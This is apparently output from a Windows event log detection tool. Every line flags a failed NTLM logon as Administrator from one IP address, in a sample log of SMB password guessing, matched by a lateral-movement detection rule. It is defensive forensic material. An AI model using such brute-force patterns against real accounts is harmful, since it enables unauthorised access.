2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
